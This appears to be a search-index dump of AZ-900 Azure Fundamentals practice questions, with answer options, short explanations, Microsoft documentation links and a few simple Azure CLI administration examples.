                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-through-azure-active-directory-one-can-control-access-to-an-application-but-not-the-resources-of-the-application","title":"Question 2:\u00a0TRUE OR FALSE: Through Azure Active Directory one can control access to an application but not the resources of the application.","text":"
                            • FALSE
                            • TRUE

                            Explanation: Azure AD can control the access of both the apps and the app resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-what-is-the-name-of-the-open-source-project-run-by-the-apache-foundation-that-maps-to-the-hdinsight-tools-within-azure","title":"Question 3:\u00a0What is the name of the open source project run by the Apache foundation that maps to the HDInsight tools within Azure?","text":"
                            • Apache Jazz
                            • Apache Cayenne
                            • Apache Jaguar
                            • Apache Hadoop

                            Explanation: Apache Hadoop is the open source home of the HDInsight tools. For more info:\u00a0https://docs.microsoft.com/en-us/azure/hdinsight/hadoop/apache-hadoop-introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-which-tool-within-the-azure-portal-will-make-specific-recommendations-based-on-your-actual-usage-for-how-you-can-improve-your-use-of-azure","title":"Question 4:\u00a0Which tool within the Azure Portal will make specific recommendations based on your actual usage for how you can improve your use of Azure?","text":"
                            • Azure Monitor
                            • Azure Service Health
                            • Azure Dashboard
                            • Azure Advisor

                            Explanation: Azure Advisor - a tool that will analyze your use of Azure and make you specific recommendations based on your usage across availability, security, performance and cost categories. For more info:\u00a0https://docs.microsoft.com/en-us/azure/advisor/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-what-does-it-mean-that-security-is-a-shared-model-in-azure","title":"Question 5: What does it mean that security is a \"shared model\" in Azure?","text":"
                            • Both users and Azure have responsibilities for security.
                            • You must keep your security keys private and ensure it doesn't get out.
                            • Azure takes care of security completely.
                            • Azure takes no responsibility for security.

                            Explanation: The shared security model means that, depending on the application model, you and Azure both have roles in ensuring a secure environment. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/shared-responsibility

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-the-name-of-the-collective-set-of-apis-that-provide-machine-learning-and-artificial-intelligence-services-to-your-own-applications-like-voice-recognition-image-tagging-and-chat-bot","title":"Question 6:\u00a0What is the name of the collective set of APIs that provide machine learning and artificial intelligence services to your own applications like voice recognition, image tagging, and chat bot?","text":"
                            • Cognitive Services
                            • Natural Language Service, LUIS
                            • Azure Machine Learning Studio
                            • Azure Batch

                            Explanation: Azure Cognitive Services is the set of Machine Learning and AI API's. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-what-happens-if-azure-does-not-meet-its-own-service-level-agreement-guarantee-sla","title":"Question 7:\u00a0What happens if Azure does not meet its own Service Level Agreement guarantee (SLA)?","text":"
                            • The service will be free that month
                            • You will be financially refunded a small amount of your monthly fee
                            • It's not possible. Azure will always meet its SLA.

                            Explanation: Microsoft offers a refund of 10% or 25% depending on how badly they miss their service guarantee. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-software-is-used-to-synchronize-your-on-premises-ad-with-your-azure-ad","title":"Question 8:\u00a0What software is used to synchronize your on premises AD with your Azure AD?","text":"
                            • Azure AD Federation Services
                            • Azure AD Domain Services
                            • LDAP
                            • AD Connect

                            Explanation: AD Connect is used to synchronize your corporate AD with Azure AD. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-true-or-false-if-your-feature-is-in-the-general-availability-phase-then-your-feature-will-receive-support-from-all-microsoft-support-channels","title":"Question 9:\u00a0True or false: If your feature is in the General Availability phase, then your feature will receive support from all Microsoft support channels.","text":"
                            • TRUE
                            • FALSE

                            Explanation: This is true. Do not use preview features in production apps. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-true-or-false-if-you-wanted-to-deploy-a-virtual-machine-to-china-you-would-just-choose-the-china-region-from-the-drop-down","title":"Question 10:\u00a0TRUE OR FALSE: If you wanted to deploy a virtual machine to China, you would just choose the China region from the drop down.","text":"
                            • FALSE
                            • TRUE

                            Explanation: Some regions of the world, such as Germany and China, require special contracts with a local provider. For more info:\u00a0https://docs.microsoft.com/en-us/azure/china/overview-checklist

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-what-is-a-policy-initiative-in-azure","title":"Question 11: What is a policy initiative in Azure?","text":"
                            • A custom designed policy
                            • Requiring all resources in Azure to use tags
                            • The ability to group policies together
                            • Assigning permissions to a role in Azure

                            Explanation: The ability to group policies together. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview#initiative-definition

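                            An initiative is created by grouping existing policy definition IDs; a minimal sketch with the Azure CLI (the IDs below are placeholders):

                            az policy set-definition create \
                              --name demo-initiative \
                              --definitions '[
                                { "policyDefinitionId": "/providers/Microsoft.Authorization/policyDefinitions/<id-1>" },
                                { "policyDefinitionId": "/providers/Microsoft.Authorization/policyDefinitions/<id-2>" }
                              ]'
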
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-which-database-product-offers-sub-5-millisecond-response-times-as-a-feature","title":"Question 12: Which database product offers \"sub 5 millisecond\" response times as a feature?","text":"
                            • Cosmos DB
                            • SQL Data Warehouse
                            • SQL Server in a VM
                            • Azure SQL Database

                            Explanation: Cosmos DB is low latency, and even offers sub 5-ms response times at some levels. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-resources-are-not-considered-compute-resources","title":"Question 13:\u00a0Which of the following resources are not considered Compute resources?","text":"
                            • Function Apps
                            • Azure Batch
                            • Virtual Machines
                            • Virtual Machine Scale Sets
                            • Load Balancer

                            Explanation: A load balancer is a networking product, and does not execute your code. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview. For more information on compute resources:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-with-azure-public-cloud-anyone-with-a-valid-credit-card-can-sign-up-and-get-services-immediately","title":"Question 14:\u00a0With Azure public cloud, anyone with a valid credit card can sign up and get services immediately","text":"
                            • FALSE
                            • TRUE

                            Explanation: Yes, Azure public cloud is open to the public in all countries that Azure supports. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/create-an-azure-account/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-azure-service-can-be-enabled-to-enable-multi-factor-authentication-for-administrators-but-not-require-it-for-regular-users","title":"Question 15:\u00a0Which Azure service can be enabled to enable Multi-Factor Authentication for administrators but not require it for regular users?","text":"
                            • Azure AD B2B
                            • Advanced Threat Protection
                            • Azure Firewall
                            • Privileged Identity Management

                            Explanation: Privileged Identity Management can be used to ensure privileged users have to jump through additional verification because of their role. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-an-azure-subscription","title":"Question 16: What is an Azure Subscription?","text":"
                            • Each user account is associated with a unique subscription. If you need more than one subscription, you need to create multiple user accounts.
                            • It is the level at which services are billed. All resources created under a subscription are billed to that subscription.

                            Explanation: Subscription is the level at which things get billed. Multiple users can be associated with a subscription at various permission levels. For more info:\u00a0https://docs.microsoft.com/en-us/services-hub/health/azure_sponsored_subscription

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-operating-systems-does-an-azure-virtual-machine-support","title":"Question 17:\u00a0What operating systems does an Azure Virtual Machine support?","text":"
                            • Windows, Linux and macOS
                            • macOS
                            • Windows
                            • Linux
                            • Windows and Linux

                            Explanation: Azure Virtual Machines support Windows and Linux. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-azure-management-tool-analyzes-your-usage-of-azure-and-makes-suggestions-specifically-targeted-to-help-you-optimize-your-usage-of-azure-regarding-cost-security-and-performance","title":"Question 18:\u00a0Which Azure management tool analyzes your usage of Azure and makes suggestions specifically targeted to help you optimize your usage of Azure regarding cost, security and performance?","text":"
                            • Azure Service Health
                            • Azure Advisor
                            • Azure Firewall
                            • Azure Mobile App

                            Explanation: Azure Advisor analyzes your specific usage of Azure and makes helpful suggestions on how it can be improved.
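
                            Advisor is also queryable outside the portal from the Azure CLI (a minimal sketch; valid category values include Cost, Security, Performance, and HighAvailability):

                            # List Advisor cost recommendations in table form
                            az advisor recommendation list --category Cost --output table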

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-feature-within-azure-alerts-you-to-service-issues-that-happen-in-azure-itself-not-specifically-related-to-your-own-resources","title":"Question 19:\u00a0Which feature within Azure alerts you to service issues that happen in Azure itself, not specifically related to your own resources?","text":"
                            • Azure Monitor
                            • Azure Portal Dashboard
                            • Azure Service Health
                            • Azure Security Center

                            Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-two-features-does-virtual-machine-scale-sets-provide-as-part-of-the-core-product-pick-two","title":"Question 20:\u00a0Which two features does Virtual Machine Scale Sets provide as part of the core product? Pick two.","text":"
                            • Content Delivery Network
                            • Firewall
                            • Automatic installation of supporting apps and deployment of custom code
                            • Load balancing between virtual machines
                            • Autoscaling of virtual machines

                            Explanation: VMSS provides autoscale features and has a built-in load balancer. You still need a way to deploy your code to the new servers, as you do with regular VMs. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/
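
                            As a rough sketch of the core product (resource names are placeholders, and the image alias may vary by CLI version), one command creates the scale set, its instances, and a default load balancer:

                            # Create a 3-instance scale set; a load balancer is created by default
                            az vmss create \
                              --resource-group demo-rg \
                              --name demo-vmss \
                              --image Ubuntu2204 \
                              --instance-count 3 \
                              --admin-username azureuser \
                              --generate-ssh-keys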

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-can-you-go-to-see-what-standards-microsoft-is-in-compliance-with","title":"Question 21:\u00a0Where can you go to see what standards Microsoft is in compliance with?","text":"
                            • Azure Service Health
                            • Azure Security Center
                            • Trust Center
                            • Azure Privacy Page

                            Explanation: The list of standards that Azure has been certified to meet is in the Trust Center. For more info:\u00a0https://www.microsoft.com/en-us/trust-center

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-does-it-mean-if-a-service-is-in-private-preview-mode","title":"Question 22: What does it mean if a service is in Private Preview mode?","text":"
                            • The service is generally available for use, and Microsoft will provide support for it
                            • Anyone can use the service but it must not be for production use
                            • You have to apply to get selected in order to use that service
                            • Anyone can use the service for any reason

                            Explanation: Private Preview means you have to apply to use a service, and you may or may not be selected. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-what-are-groups-of-subscriptions-called","title":"Question 23: What are groups of subscriptions called?","text":"
                            • Azure Policy
                            • Subscription Groups
                            • ARM Groups
                            • Management Groups

                            Explanation: Subscriptions can be nested and placed into management groups to make managing them easier. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview
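
                            A minimal sketch with the Azure CLI (the group name and subscription ID are placeholders):

                            # Create a management group and move a subscription into it
                            az account management-group create --name corp-root
                            az account management-group subscription add --name corp-root --subscription <subscription-id>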

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-how-do-you-stop-your-azure-account-from-incurring-costs-above-a-certain-level-without-your-knowledge","title":"Question 24: How do you stop your Azure account from incurring costs above a certain level without your knowledge?","text":"
                            • Switch to Azure Reserved Instances with Hybrid Benefit for VMs
                            • Only use Azure Functions which have a significant free limit
                            • Implement the Azure spending limit in the Account Center
                            • Set up a billing alert to send you an email when it reaches a certain level

                            Explanation: If you don't want to spend over a certain amount, implement a spending limit in the account center. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/spending-limit
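
                            Budgets with alert thresholds can also be scripted. A sketch only: the az consumption budget commands are in preview and their exact flags may differ between CLI versions.

                            # Create a $200 monthly cost budget on the current subscription
                            az consumption budget create \
                              --budget-name monthly-cap \
                              --amount 200 \
                              --category cost \
                              --time-grain monthly \
                              --start-date 2024-06-01 \
                              --end-date 2025-06-01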

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-how-does-multi-factor-authentication-make-a-system-more-secure","title":"Question 25:\u00a0How does Multi-Factor Authentication make a system more secure?","text":"
                            • It allows the user to log in without a password because they have already previously been validated using a browser cookie
                            • It requires the user to have access to their verified phone in order to log in
                            • It doesn't make it more secure
                            • It is another password that a user has to memorize, making it more secure

                            Explanation: Multi-Factor Authentication (MFA) - the concept of requiring something in addition to a password in order to log in; passwords can be found or guessed, but having your mobile phone on you to receive a call or text, or to run an app that generates a code, is much harder for an unknown hacker to obtain. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-how-many-hours-are-available-free-when-using-the-azure-b1s-general-purpose-virtual-machines-under-a-azure-free-account-in-the-first-12-months","title":"Question 26:\u00a0How many hours are available free when using the Azure B1S General Purpose Virtual Machines under a Azure free account in the first 12 months?","text":"
                            • 500 hrs
                            • 750 hrs
                            • 300 hrs
                            • Indefinite amount of hrs

                            Explanation: Each Azure free account includes 750 hours free for Azure B1S General Purpose Virtual Machines for the first 12 months. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-what-is-the-goal-of-a-ddos-attack","title":"Question 27:\u00a0What is the goal of a DDoS attack?","text":"
                            • To extract data from a database
                            • To trick users into giving up personal information
                            • To overwhelm and exhaust application resources
                            • To crack the password from administrator accounts

                            Explanation: DDoS is a type of attack that tries to exhaust application resources. The goal is to affect the application\u2019s availability and its ability to handle legitimate requests. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-true-or-false-azure-powershell-scripts-and-command-line-interface-cli-scripts-are-entirely-compatible-with-each-other","title":"Question 28: True or false: Azure PowerShell scripts and Command Line Interface (CLI) scripts are entirely compatible with each other?","text":"
                            • TRUE
                            • FALSE

                            Explanation: No. PowerShell is its own language, different from the CLI. For more info:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0
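
                            The incompatibility is easy to see side by side: the same resource-group creation uses entirely different syntax in each tool (demo-rg is a placeholder name).

                            # Azure CLI (bash)
                            az group create --name demo-rg --location eastus

                            # Az PowerShell equivalent (runs in pwsh, not in bash):
                            # New-AzResourceGroup -Name demo-rg -Location eastus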

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-for-tax-optimization-which-type-of-expense-is-preferable","title":"Question 29:\u00a0For tax optimization, which type of expense is preferable?","text":"
                            • CapEx
                            • OpEx

                            Explanation: Operating Expenditure is thought to be preferable because you can fully deduct expenses when they are incurred. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/fiscal-outcomes

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-is-the-recommended-way-within-azure-to-store-secrets-such-as-private-cryptographic-keys","title":"Question 30:\u00a0What is the recommended way within Azure to store secrets such as private cryptographic keys?","text":"
                            • Azure Advanced Threat Protection (ATP)
                            • In an Azure Storage account private blob container
                            • Within the application code
                            • Azure Key Vault

                            Explanation: Azure Key Vault - the modern way to store cryptographic keys, signed certificates and secrets in Azure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/key-vault/
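
                            A minimal sketch of the workflow (vault and secret names are placeholders; vault names must be globally unique):

                            # Create a vault, store a secret, then read it back
                            az keyvault create --name demo-kv-12345 --resource-group demo-rg --location eastus
                            az keyvault secret set --vault-name demo-kv-12345 --name db-password --value 'S3cr3t!'
                            az keyvault secret show --vault-name demo-kv-12345 --name db-password --query value -o tsv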

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-would-be-an-example-of-an-internet-of-things-iot-device","title":"Question 31:\u00a0Which of the following would be an example of an Internet of Things (IoT) device?","text":"
                            • A video game, installed on Windows clients around the world, that keeps user scores in the cloud.
                            • A mobile application that is used to watch online video courses
                            • A refrigerator that monitors how much milk you have left and sends you a text message when you are running low
                            • A web application that people use to perform their banking tasks

                            Explanation: An IoT device is not a standard computing device but connects to a network to report data on a regular basis. A web server, a personal computer, or a mobile app is not an IoT device. For more info:\u00a0https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-deploying-azure-app-services-applications-consists-of-what-two-components-pick-two","title":"Question 32:\u00a0Deploying Azure App Services applications consists of what two components? Pick two.","text":"
                            • Database scripts
                            • Configuration
                            • Managing operating system updates
                            • Packaged code

                            Explanation: Azure App Services, platform as a service, consists of code and configuration. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/
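
                            The code/configuration split is visible in the CLI as two separate steps (app and setting names are placeholders; az webapp deploy requires a recent CLI version):

                            # Deploy packaged code to an existing App Service app
                            az webapp deploy --resource-group demo-rg --name demo-app --src-path app.zip

                            # Apply configuration separately, as app settings
                            az webapp config appsettings set --resource-group demo-rg --name demo-app \
                              --settings ENVIRONMENT=production API_URL=https://api.example.com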

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-what-type-of-documents-does-the-microsoft-service-trust-portal-provide","title":"Question 33:\u00a0What type of documents does the Microsoft Service Trust Portal provide?","text":"
                            • Documentation on the individual Azure services and solutions
                            • Specific recommendations about your usage of Azure and ways you can improve
                            • A list of standards that Microsoft follows, pen test results, security assessments, white papers, FAQs, and other documents that can be used to show Microsoft's compliance efforts
                            • A tool that helps you manage your compliance to various standards

                            Explanation: A list of standards that Microsoft follows, pen test results, security assessments, white papers, FAQs, and other documents that can be used to show Microsoft's compliance efforts. For more info:\u00a0https://servicetrust.microsoft.com/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-of-the-following-are-one-of-the-advantages-of-running-your-cloud-in-a-private-cloud","title":"Question 34: Which of the following are one of the advantages of running your cloud in a private cloud?","text":"
                            • Assurance that your code, data and applications are running on isolated hardware, and on an isolated network.
                            • You own the hardware, so you can change private cloud hosting providers easily.
                            • Private cloud is significantly cheaper than the public cloud.

                            Explanation: Private cloud generally means that you are running your code on isolated computing, not mixed in with other companies. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-are-private-public-hybrid-clouds/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-advantage-does-an-application-gateway-have-over-a-load-balancer","title":"Question 35:\u00a0What advantage does an Application Gateway have over a Load Balancer?","text":"
                            • Application Gateway is more like an enterprise-grade product. You should not use a load balancer in production.
                            • Application gateway understands the HTTP protocol and can interpret the URL and make decisions based on the URL.
                            • Application Gateway can be scaled so that two, three or more instances of the gateway can support your application.

                            Explanation: Application gateway can make load balancing decisions based on the URL path, while a load balancer can't. For more info:\u00a0https://docs.microsoft.com/en-us/azure/application-gateway/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-if-you-wanted-to-get-an-alert-every-time-a-new-virtual-machine-is-created-where-could-you-create-that","title":"Question 36:\u00a0If you wanted to get an alert every time a new virtual machine is created, where could you create that?","text":"
                            • Azure Monitor
                            • Azure Policy
                            • Subscription settings
                            • Azure Dashboard

                            Explanation: The best place to track events at the resource level is Azure Monitor. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/
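
                            A sketch of such an alert rule (names are placeholders; in practice you would also attach an action group so the alert notifies someone):

                            # Fire whenever a VM write (create/update) appears in the activity log
                            az monitor activity-log alert create \
                              --name vm-created-alert \
                              --resource-group demo-rg \
                              --condition 'category=Administrative and operationName=Microsoft.Compute/virtualMachines/write'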

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-how-many-minutes-per-month-downtime-is-9999-availability","title":"Question 37:\u00a0How many minutes per month downtime is 99.99% availability?","text":"
                            • 4
                            • 1
                            • 40
                            • 100

                            Explanation: 99.99% is 4 minutes per month of downtime. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/summary/
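
                            The arithmetic behind that answer, assuming a 30-day month:

                            30 days x 24 h x 60 min = 43,200 minutes per month
                            43,200 x (1 - 0.9999) = 43,200 x 0.0001 = 4.32 minutes of allowed downtime, i.e. roughly 4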

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-placed-into-the-same-availability-set-in-the-same-region","title":"Question 38:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been placed into the same Availability Set in the same region?","text":"
                            • 100%
                            • 99.90%
                            • 99.99%
                            • 99.95%

                            Explanation: 99.95%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-core-problem-that-you-need-to-solve-in-order-to-have-a-high-availability-application","title":"Question 39:\u00a0What is the core problem that you need to solve in order to have a high-availability application?","text":"
                            • You need to avoid single points of failure
                            • You need to ensure your server has a lot of RAM and a lot of CPUs
                            • You should have a backup copy of your application on standby, ready to be started up when the main application fails.
                            • You need to ensure the capacity of your server exceeds your highest number of expected concurrent users

                            Explanation: You'll want to avoid single points of failure, so that any component that fails does not cause the entire application to fail. For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/design-principles/redundancy

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-are-resource-groups","title":"Question 40:\u00a0What are resource groups?","text":"
                            • A folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource
                            • Automatically assigned groups of resources that all have the same type (virtual machine, app service, etc)
                            • Based on the tag assigned to a resource by the deployment script, it is assigned to a group
                            • Within Azure security model, users are organized into groups, and those groups are granted permissions to resources

                            Explanation: Resource Groups - a folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-services-would-not-be-considered-infrastructure-as-a-service","title":"Question 41:\u00a0Which of the following services would NOT be considered Infrastructure as a Service?","text":"
                            • Virtual Network Interface Card (NIC)
                            • Azure Functions App
                            • Virtual Machine
                            • Virtual Network

                            Explanation: Functions are small pieces of code that you give to Azure to run for you, and you have no access to the underlying infrastructure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-two-advantages-does-cloud-computing-elasticity-give-to-you-pick-two","title":"Question 42:\u00a0What two advantages does cloud computing elasticity give to you? Pick two.","text":"
                            • You can do more regular backups and you won't lose as much when that backup gets restored
                            • You can save money.
                            • Servers have become a commodity and Microsoft doesn't even need to fix servers that fail within Azure.
                            • You can serve users better during peak traffic periods by automatically adding more capacity.

                            Explanation: Elasticity saves you money during slow periods (over night, over the weekend, over the summer, etc) and also allows you to handle the highest peak of traffic. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-which-of-the-following-elements-is-considered-part-of-the-network-layer-of-network-security","title":"Question 43:\u00a0Which of the following elements is considered part of the \"network\" layer of network security?","text":"
                            • Keeping operating systems up to date with patches
                            • All of the above
                            • Locks on the data center doors
                            • Separate servers into distinct subnets by role

                            Explanation: Subnets are part of the network layer of security. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices and https://en.wikipedia.org/wiki/OSI_model

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-what-data-format-are-arm-templates-created-in","title":"Question 44:\u00a0What data format are ARM templates created in?","text":"
                            • JSON
                            • YAML
                            • HTML
                            • XML

                            Explanation: ARM templates are created in JSON. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview
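
                            The smallest valid template shows the shape of the format (an empty template that deploys nothing; the file name is arbitrary):

                            {
                              "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
                              "contentVersion": "1.0.0.0",
                              "resources": []
                            }

                            It would be deployed with, for example, az deployment group create --resource-group demo-rg --template-file azuredeploy.json.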

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-does-the-letter-r-in-rbac-stand-for","title":"Question 45:\u00a0What does the letter R in RBAC stand for?","text":"
                            • Rights
                            • Review
                            • Role
                            • Rule

                            Explanation: RBAC is role based access control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/
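
                            In practice the role, not the individual user, carries the permissions; a user is then bound to a role at a scope. A sketch (the account and IDs are placeholders):

                            # Grant the built-in Reader role at resource-group scope
                            az role assignment create \
                              --assignee user@contoso.com \
                              --role Reader \
                              --scope /subscriptions/<subscription-id>/resourceGroups/demo-rg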

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-when-enabled-will-automatically-block-traffic-to-or-from-known-malicious-ip-addresses-and-domains","title":"Question 46:\u00a0Which Azure service, when enabled, will automatically block traffic to or from known malicious IP addresses and domains?","text":"
                            • Network Security Groups
                            • Azure Active Directory
                            • Azure Firewall
                            • Load Balancer

                            Explanation: Azure Firewall has a threat-intelligence option that will automatically block traffic to/from bad actors on the Internet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/firewall/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-true-or-false-azure-tenant-is-a-dedicated-and-trusted-instance-of-azure-active-directory-thats-automatically-created-when-your-organization-signs-up-for-a-microsoft-cloud-service-subscription","title":"Question 47:\u00a0TRUE OR FALSE: Azure Tenant is a dedicated and trusted instance of Azure Active Directory that's automatically created when your organization signs up for a Microsoft cloud service subscription.","text":"
                            • TRUE
                            • FALSE

                            Explanation: Yes, Azure Tenant is a dedicated and trusted instance of Azure AD that's automatically created when your organization signs up for a Microsoft cloud service subscription. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-why-should-you-divide-your-application-into-multiple-subnets-as-opposed-to-having-all-your-web-application-and-database-servers-running-on-the-same-subnet","title":"Question 48:\u00a0Why should you divide your application into multiple subnets as opposed to having all your web, application and database servers running on the same subnet?","text":"
                            • Each server type of your application requires its own subnet. It's not possible to mix web servers, database servers and application servers on the same subnet.
                            • Separating your application into multiple subnets allows you to have different NSG security rules for each subnet, which can make it harder for a hacker to get from one compromised server onto another.
                            • There are only a limited number of IP addresses available per subnet, so you need multiple subnets over a certain number.

                            Explanation: For security purposes, you should not allow \"port 80\" web traffic to reach certain servers, and you do that by having separate NSG rules on each subnet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices
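
                            A sketch of that per-subnet separation (all names are placeholders): the web NSG admits port 80, while the database NSG simply never gets such a rule.

                            az network nsg create --resource-group demo-rg --name web-nsg
                            az network nsg rule create --resource-group demo-rg --nsg-name web-nsg \
                              --name allow-http --priority 100 --direction Inbound --access Allow \
                              --protocol Tcp --destination-port-ranges 80
                            az network nsg create --resource-group demo-rg --name db-nsg   # no port-80 rule here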

